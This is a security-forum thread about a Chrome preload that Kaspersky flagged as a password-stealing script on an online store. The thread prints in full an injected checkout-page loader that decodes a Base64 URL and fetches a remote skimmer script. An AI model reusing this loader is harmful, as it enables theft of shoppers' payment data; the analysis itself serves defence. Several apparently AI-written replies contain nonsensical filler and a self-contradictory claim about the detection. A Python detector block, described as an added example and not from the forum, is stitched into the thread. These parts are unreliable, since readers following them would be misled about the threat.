HEUR:Trojan-PSW.Script.Generic from Google Chrome Preloading Webpages.


Solved by harlan4096


Posted

Hello,

Could someone assist me with my issue?

When I was using Google Chrome search in incognito, I forgot to remove the preload option in Google Chrome Settings.

Kaspersky blocked something from the preload, which is HEUR:Trojan-PSW.Script.Generic.
Upon checking, the MD5 of the file seems to change every time it shows up in the search results and gets preloaded by Google Chrome. All downloads are said to be blocked by Kaspersky.

Event: Download denied
User: Jayce/Marke11
User type: Initiator
Application name: chrome.exe
Application path: C:\Program Files\Google\Chrome\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic analysis
Threat level: High
Object type: File
Object path: https://emersonknives.com
MD5 of an object: EE292C799BA6A8D346A3B0439F4263DA
Reason: Expert analysis
Databases release date: Today, 11/26/2024 5:59:00 PM

==

Event: Malicious object detected
User: Jayce/Marke11
User type: Initiator
Application name: chrome.exe
Application path: C:\Program Files\Google\Chrome\Application
Component: Safe Browsing
Result description: Detected
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic analysis
Threat level: High
Object type: File
Object path: https://emersonknives.com
MD5 of an object: EE292C799BA6A8D346A3B0439F4263DA
Reason: Expert analysis
Databases release date: Today, 11/26/2024 5:59:00 PM

VirusTotal and OpenTip show nothing.

https://www.virustotal.com/gui/url/0f05f2a96bec7b07511ec309027cfaa2610b27edff63ecc970dc1099ddfb92fb
https://opentip.kaspersky.com/https%3A%2F%2Femersonknives.com%2F/?tab=lookup

I do not wish to open the website or preload it again via Google Chrome Search, and I have no backup of the file from the site or of its hash.
Is my machine safe, do I need to do anything?

Assistance will be appreciated.

Thank you.

Posted

@MoonCelt Welcome.

33 minutes ago, MoonCelt said:

Is my machine safe, do I need to do anything?

Kaspersky blocked the download before it reached your machine, so you don't need to take any action.
In the meantime I submitted this detection to the Kaspersky Virus Lab; the verdict will be provided when available.

  • Like 2
  • Solution
harlan4096
Posted

About that URL detected:

Quote

Hello,

This is not a false alarm. This site is infected.
Here is the malicious code:


!function(t,e){var c=t.currentScript;if(c&&c.parentNode.removeChild(c),location.href.match(/checkout/)&&!("10378c24fd7924fa"in e)){var a=t.createElement("script");a.setAttribute("src",e.atob("aHR0....

If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

Best regards, Malware Analyst

So, probably your Chrome is infected: check the add-ons and do a Chrome settings reset.

 

Do you get the same detection if you try with Mozilla Firefox?

  • Like 2
Posted (edited)

Hello,

Thank you both for your assistance.

9 hours ago, harlan4096 said:

About that URL detected:

So, probably your Chrome is infected: check the add-ons and do a Chrome settings reset.

 

Do you get the same detection if you try with Mozilla Firefox?

This is unfortunate to hear. I do not use Firefox, therefore I wasn't able to check.

I might opt for a fresh Windows reinstall for peace of mind. I will make sure to have preloading turned off in my browsers this time around.

Cheers.

Edited by MoonCelt
Posted

Hello @MoonCelt

Also, thank you, Moderator harlan4096, for providing the malicious code.

Based on the snippet, here’s an analysis of its structure and intent, as well as actions you should take to ensure safety.


Malicious Code Analysis

Observed Behavior:

  1. Dynamic Script Injection:

    • The code targets the current script (t.currentScript) and removes it (c.parentNode.removeChild(c)), likely to obfuscate its source and reduce traceability.
  2. Targeted Trigger:

    • It checks if the URL contains the string checkout (location.href.match(/checkout/)). This indicates it targets e-commerce sites, possibly aiming to steal payment information during transactions.
  3. Suspicious Key/Flag:

    • The code checks for "10378c24fd7924fa" in the window object ("10378c24fd7924fa" in e). If not present, it proceeds to load a secondary script.
  4. Obfuscated Secondary Script:

    • A new script is created (t.createElement("script")) and its source is set using a Base64-decoded URL (e.atob(...)), making it harder to detect or analyze without decoding.

Likely Intent:

  • The code suggests credential theft or skimming, especially targeting checkout pages.
  • It may load additional malicious payloads from the Base64-decoded URL.

Recommendations for Webmasters

If you manage the site or are in contact with its administrators:

  1. Remove the Malicious Code:

    • Identify all instances of this code on the website (e.g., embedded scripts, injected files) and remove them immediately.
  2. Scan for Backdoors:

    • Use tools like Wordfence (if the site is WordPress-based) or a server-level malware scanner to detect unauthorized access points.
  3. Change Credentials:

    • Update passwords for:
      • Hosting account.
      • CMS admin panel.
      • FTP/SFTP accounts.
      • Database and any APIs linked to the site.
  4. Review Recent Changes:

    • Check logs for unauthorized file modifications or uploads.
    • Pay special attention to scripts or pages recently edited.
  5. Secure the Website:

    • Update all CMS, plugins, and extensions to the latest versions.
    • Implement a Web Application Firewall (WAF) for ongoing protection.

Recommendations for Users

If you’re accessing the site as a visitor or suspect exposure to malicious content:

  1. Ensure Your System is Safe:

    • Kaspersky blocked the threat, but run a full scan to confirm no traces remain.
  2. Check for Suspicious Browser Behavior:

    • Look for unexpected redirects, pop-ups, or unauthorized browser extensions.
  3. Avoid the Website:

    • Block the domain in your Kaspersky settings or host file.
  4. Monitor Your Financial Activity:

    • If you interacted with the site’s checkout page, monitor your bank statements for unusual transactions.

For Further Action

  • Decode the Payload:

    • The secondary script’s source is Base64-encoded (e.atob(...)). If you provide the full encoded string, I can decode and analyze its behavior for a deeper understanding of the threat.
  • Report the Site:

    • Notify Kaspersky and relevant authorities (e.g., Google Safe Browsing) to help flag the site as malicious and warn other users.

Let me know if you need assistance decoding the Base64 or further investigating!

Thank you

  • Like 3
Posted (edited)

Hello, 

Thank you for this in depth view.

I never interacted with the website aside from Google Chrome preloading it from the search results. A full scan with Kaspersky did not show any detections. I logged out of accounts and removed any active sessions/cookies.

I decided to reinstall Windows 11 today as it was also due for a fresh reinstall. This step should technically wipe any threat from the previous install as well, right?

I will report it to Google Safe Search as per the recommendation.

Cheers.

 

Edited by MoonCelt
  • Like 2
Posted

@MoonCelt Hello,

↓ Only for your information ↓

[attached screenshot: emmersonknives.jpg]

No detection from Kaspersky and AdwCleaner ....

  • Like 2
Posted (edited)
On 11/27/2024 at 3:39 PM, KarDip said:

For Further Action

  • Decode the Payload:

    • The secondary script’s source is Base64-encoded (e.atob(...)). If you provide the full encoded string, I can decode and analyze its behavior for a deeper understanding of the threat.
  • Report the Site:

    • Notify Kaspersky and relevant authorities (e.g., Google Safe Browsing) to help flag the site as malicious and warn other users.

Let me know if you need assistance decoding the Base64 or further investigating!

Thank you

Hello @KarDip,

 

Attached is the full snippet of the offending code along with the Base64. Could you assist to decode it and share what it does?

Apologies for only being able to use photos for it as I accessed it on a locked/isolated machine.

On 11/27/2024 at 4:37 PM, Berny said:

@MoonCelt Hello,

↓ Only for your information ↓

[attached screenshot: emmersonknives.jpg]

No detection from Kaspersky and AdwCleaner ....

Hello @Berny,

This is fantastic news; thank you for sharing the AdwCleaner results with me as well.

Regards,

MoonCelt

[attached screenshots: IMG_4052.png, IMG_4054.png]

Edited by MoonCelt
  • Like 1
Posted

@MoonCelt

I cannot decode photos.

The image appears to be a screenshot of a code editor or IDE (Integrated Development Environment). It shows a section of code written in what looks like JavaScript or a similar programming language.

The code snippet includes various programming constructs such as variable declarations, function calls, and object properties. However, without more context, I cannot provide a detailed explanation of the code's purpose or functionality.

I suggest you send it to Kaspersky Technical Support to analyse.

Posted

Hello @KarDip

Would you be able to proceed with decoding the complete script below?

Complete with the Base64, as per below.

On 11/27/2024 at 3:22 AM, harlan4096 said:

!function(t,e){var c=t.currentScript;if(c&&c.parentNode.removeChild(c),location.href.match(/checkout/)&&!("10378c24fd7924fa"in e)){var a = t.createElement("script");
a.setAttribute(“src”, e.atob("aHR0cHM6Ly9mbGV4LXF1ZXJ5LmNvbS9zdGF0aWMvMTAzNzhjMjRmZDc5MjRmYS9qcXVlcnkuanM=") + “?t=“ Date+now()),
t. head-appendChild(a)
}

Apologies again and hoping for your assistance.

Thank you

MoonCelt

Posted (edited)

@MoonCelt

Copy-pasted script provided by MoonCelt:

!function(t,e){var c=t.currentScript;if(c&&c.parentNode.removeChild(c),location.href.match(/checkout/)&&!("10378c24fd7924fa"in e)){var a = t.createElement("script");

The two code snippets you've shared with me appear to be closely related.

Is it possible these two scripts you found might have worked together?

Also, maybe you can fix it this way with luck; don't blink.

Here's a deeper look.

Let me try and break it down for you:

Also, I am not responsible if you attempt this in the future; you do so at your own risk.

How They May Connect:

  1. First Part (!function(t,e){...}):
    • This is an Immediately Invoked Function Expression (IIFE), a common pattern used in JavaScript to execute a function as soon as it's defined.
    • t.currentScript gets the current script element (the one running the code). It then removes this script from the DOM to potentially cover the tracks of the malicious code.
    • location.href.match(/checkout/) checks if the current page is part of a checkout process (common in e-commerce sites). This suggests the script only runs during the checkout phase.
    • !("10378c24fd7924fa" in e) ensures that the script only runs once, preventing re-execution by checking the absence of a specific key in the e object.
  2. Second Part (Decoding and Loading the Malicious Script):
    • The script decodes a Base64-encoded string into a URL (hyperlink removed). This is the location of the malicious script being fetched.
    • t.head-appendChild(a) appends the new script to the HTML <head> section, causing it to be executed.

Implications of This Code:

  • Evasion Tactics: The script attempts to avoid detection by removing itself after execution, possibly to cover its tracks. It also only executes on specific pages (like checkout), which suggests it’s targeting sensitive user activity.

  • Malicious Payload: The second part of the script (the one fetching the remote file) suggests that this is part of a larger, more sophisticated malware payload. The malicious script could be used for tracking, stealing credit card information, injecting additional malware, or even manipulating the checkout process itself.

What You Should Do:

  1. Check Browser and Extensions: The malicious script might have been injected into your browser. Review your browser’s extensions and disable or remove any that seem suspicious. Clear your browser's cache and cookies to ensure no leftover malicious data.

  2. Scan with Antivirus: Run a thorough system scan using your antivirus (like Kaspersky) to ensure there are no residual threats or other forms of malware.

  3. Monitor Your Accounts: If you accessed any online stores or entered payment information during this time, monitor your bank and credit card statements for any unauthorized transactions. Consider using services like credit monitoring or fraud alerts.

  4. Review Security Logs: If this infection was part of a larger network issue, you might want to review security logs or consult with an IT professional to identify any other vulnerabilities.

I think you have already done the reinstall; if not: if this seems particularly complex or difficult to handle, it might be a good idea to perform a full OS reinstall to ensure that all traces of the malware are removed.

==========

@MoonCelt

a.setAttribute(“src”, e.atob("aHR0cHM6Ly9mbGV4LXF1ZXJ5LmNvbS9zdGF0aWMvMTAzNzhjMjRmZDc5MjRmYS9qcXVlcnkuanM=") + “?t=“ Date+now()), t. head-appendChild(a) }

It seems like the code you found on your computer might be related to a potential malware infection or malicious script.

Also, maybe you can fix it this way with luck; don't blink twice.

Let me try and break it down for you:

Also, I am not responsible if you attempt this in the future; you do so at your own risk.

Breakdown of the Code:

  1. location.href.match(/checkout/): This part checks if the current URL contains the word "checkout." This could indicate the script is trying to execute only during the checkout process of an online store or a similar web page.

  2. !('10378c24fd7924fa' in e): This condition checks whether a specific key (likely related to a tracking or security identifier) is not in the object e, indicating that the script hasn't run before or doesn't have a particular flag.

  3. var a = t.createElement("script");: Creates a new script element in the document.

  4. a.setAttribute("src", e.atob("aHR0cHM6Ly9mbGV4LXF1ZXJ5LmNvbS9zdGF0aWMvMTAzNzhjMjRmZDc5MjRmYS9qcXVlcnkuanM=")): This decodes a Base64 string, which results in a URL (hyperlink removed). This indicates that the script is attempting to load a malicious JavaScript file from this URL.

  5. t.head-appendChild(a): This appends the new script element to the head of the document, effectively executing the malicious script.

What this means:

  • Malicious Activity: The script is attempting to load and execute a remote JavaScript file from a suspicious domain (flex-query.com). This file could be a form of malware designed to perform various malicious activities, such as tracking, data collection, or even injecting further harmful code.

  • Potential Data Theft: If the script was allowed to run, it could compromise sensitive information such as credit card details, login credentials, or other personal data from the user.

Next Steps:

  • Remove the Infection: If your computer was infected, it's crucial to ensure that the malicious script has been fully removed. You can use a trusted antivirus tool (like Kaspersky) to run a deep scan of your system.

  • Clear Browser Cache: Malicious scripts can sometimes be injected into your browser cache or extensions. Clear your browser's cache and check for any suspicious extensions or add-ons.

  • Check Startup Programs: Ensure there are no malicious programs set to run at startup. You can check this in Windows through Task Manager > Startup or using specialized software like Autoruns.

  • Reinstall Security Software: Make sure your antivirus or security software is up to date, and consider reinstalling it to ensure all components are functioning properly.

  • Monitor for Suspicious Activity: Keep an eye on any unusual behavior on your system, such as unexpected pop-ups, slow performance, or strange network activity.

If you have further concerns or need help investigating deeper, feel free to reach out.

Edited by KarDip
removed hyperlink
  • Like 1
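A defender-side check for this kind of loader, written as an added example for this thread (it is not code from the forum, from Kaspersky or from the site): it pulls inline scripts out of page source, decodes any atob("...") literal, and reports scripts that stack the traits KarDip's two breakdowns describe (removing their own script element, gating on /checkout/, a hex run-once key on window, injecting a script element, a Date.now() cache-buster) with a decoded URL pointing off-site. The page it scans is a constructed sample, and the stand-in Base64 decodes to an example.invalid host rather than the real one; own_hosts is an assumed list of the site's legitimate hostnames.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed sample page (NOT the real site): one inline script shaped like the
# loader quoted in the thread, with its Base64 URL replaced by a stand-in that
# decodes to an example.invalid host, plus two benign scripts for contrast.
STANDIN_B64 = base64.b64encode(b"https://example.invalid/static/jquery.js").decode()
SAMPLE_HTML = (
    '<html><head><script src="/static/app.js"></script>\n'
    '<script>!function(t,e){var c=t.currentScript;if(c&&c.parentNode.removeChild(c),'
    'location.href.match(/checkout/)&&!("deadbeef00000000"in e)){var a=t.createElement("script");'
    f'a.setAttribute("src",e.atob("{STANDIN_B64}")+"?t="+Date.now()),t.head.appendChild(a)}}}}'
    '(document,window);</script>\n'
    '<script>console.log("benign");</script></head><body></body></html>'
)

# Inline <script> blocks only (tags carrying src= are external and skipped here).
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.S | re.I)
# atob("...") with a literal Base64 argument, as in the quoted loader.
ATOB_LITERAL = re.compile(r"atob\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")

# Traits the thread's breakdowns call out; each is weak alone, suspicious together.
INDICATORS = {
    "removes its own script element": re.compile(r"currentScript.*?removeChild", re.S),
    "gated on a /checkout/ URL": re.compile(r"location\.href\.match\(/checkout/\)"),
    "hex run-once key checked on window": re.compile(r"!\(\s*[\"'][0-9a-f]{8,}[\"']\s*in\s+\w+\)"),
    "injects a new script element": re.compile(r"createElement\([\"']script[\"']\)"),
    "cache-busting Date.now() query": re.compile(r"Date\.now\(\)"),
}


def decode_atob_urls(js):
    """Return (base64, decoded) pairs for atob literals that decode to http(s) URLs."""
    found = []
    for b64 in ATOB_LITERAL.findall(js):
        try:
            text = base64.b64decode(b64, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 or not text: not a hidden URL
        if urlparse(text).scheme in ("http", "https"):
            found.append((b64, text))
    return found


def scan_html(html, own_hosts):
    """Flag inline scripts that decode an off-site URL or stack two or more loader traits."""
    findings = []
    for idx, js in enumerate(INLINE_SCRIPT.findall(html)):
        hits = [name for name, rx in INDICATORS.items() if rx.search(js)]
        urls = [u for _, u in decode_atob_urls(js)]
        hosts = {urlparse(u).hostname for u in urls if urlparse(u).hostname}
        foreign = sorted(hosts - set(own_hosts))
        if foreign or len(hits) >= 2:
            findings.append({"script_index": idx, "indicators": hits,
                             "decoded_urls": urls, "third_party_hosts": foreign})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, {"shop.example"}):  # shop.example: assumed own host
        print(f"inline script #{f['script_index']}: {', '.join(f['indicators'])}")
        print("  decoded URLs:", f["decoded_urls"], "off-site hosts:", f["third_party_hosts"])
```

Run it against the saved HTML of a checkout page (or every template file of the CMS) and treat any off-site host in the report as something to verify against the site's own deployment records before touching it.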
Posted (edited)

Hello @KarDip,

It seems the said offending code has been removed from Emerson Knives today.

Would it be okay to know what the .js file does? Could it be a RAT?

Is it possible to try executing the .js file by accessing the .js file link? Or does it need to be run in the console?

Please also remove the hyperlink so others won't click it by mistake.

Do you think a fresh full reinstall with secure erase would be enough?

Really sorry about the continued questions.

Thank you very much.

MoonCelt

Edited by MoonCelt
Posted

To clarify my questions in above post since I seem to have worded them a bit wrong and I cannot edit anymore.

1. Would it be possible to know what the .js file does? Could it possibly be a RAT?

2. Is it possible to run the .js file just by opening the .js file link in a browser? Or does it need to be run in the console as a script?

3. Would a full fresh reinstall be enough in this case to be safe? Also zero-flushing the drives via secure erase and DiskPart.

My additional concerns:

1. Is this .js file possibly the file that Kaspersky blocked initially? I do not have a picture of it, but please see the photo below from Berny.

On 11/27/2024 at 4:37 PM, Berny said:

@MoonCelt

[attached screenshot: emmersonknives.jpg]

No detection from Kaspersky and AdwCleaner ....

Thank you very much.

MoonCelt

Posted

@MoonCelt

I'll address each of your concerns based on the information you provided:

1. What does the .js file do? Could it possibly be a RAT?

A .js file is a JavaScript file, and while JavaScript itself is typically used for legitimate purposes like web interactivity, it can be exploited to perform malicious actions. Whether it is a Remote Access Trojan (RAT) or something else depends on the code within the .js file. A RAT allows an attacker to remotely control a system, steal data, or perform malicious actions without the user’s knowledge.

If the .js file contains malicious code, it could potentially exploit vulnerabilities to download and execute a RAT or other types of malware. Without seeing the actual contents of the .js file, it’s difficult to say definitively, but if Kaspersky blocked it, there’s a possibility it was flagged as malicious, which would support this idea.

2. Is it possible to run the .js file just by opening the .js file link on a browser? Or does it need to be run on the console as a script?

Yes, a .js file can run automatically in a browser if linked to from a website. However, this depends on how the file is served and whether it’s executed via a malicious website, or included in an HTML document to run when the page loads.

  • If it’s a standalone .js file, it typically won’t run just by clicking the link unless there’s a specific mechanism to execute it (such as if it's embedded in a webpage).
  • If it’s embedded within an HTML page or loaded as part of a larger malicious payload, just visiting the webpage could trigger the execution of the script, which could lead to further exploits (e.g., via drive-by download attacks).
  • To run the .js file manually, you’d need to open it in the browser’s developer tools (Console), or execute it in a local environment like Node.js. If it’s embedded in a webpage, it could run without any user interaction beyond visiting the page.

3. Would a full fresh reinstall be enough to be safe? Also, zero flushing the drives via secure erase and disk part?

A full reinstall can be an effective way to remove persistent threats, but it depends on the type of attack and how deeply the malware has infected the system.

  • Fresh reinstall: This can clean up most issues, but if the malware has embedded itself in system firmware (e.g., UEFI/BIOS rootkits), a reinstall alone won’t be sufficient.

  • Zero-flushing drives / secure erase: If you suspect that your system has been severely compromised, wiping the drives with a secure erase will make sure no residual data remains. You can use disk partitioning tools like DiskPart or third-party tools like DBAN for this. This step ensures that even deeply embedded malware is removed.

If you do a full wipe, you’ll need to reinstall Windows (or your OS) and all software from trusted sources. Afterward, ensure your antivirus is up to date and runs a full scan to check for any remaining threats.

Additional Concerns:

It's harder to know for sure, but if Kaspersky did block the file, it likely considered it not suspicious. The lack of detection from AdwCleaner suggests that it could have been a more sophisticated threat (like a RAT or other stealthy malware) that didn't present itself in typical ways.

Given that no detection was reported by both Kaspersky and AdwCleaner, I would suggest:

  • Double-checking Kaspersky logs for details about the blocked file. It might give you more information about what was flagged.
  • Running a more comprehensive malware scan using tools like Malwarebytes, HitmanPro, or KVRT to ensure all potential threats are addressed.

If you’re still unsure, it’s best to proceed cautiously with a full system cleanup (fresh install + secure erase) and monitoring any suspicious activities after that.

The End
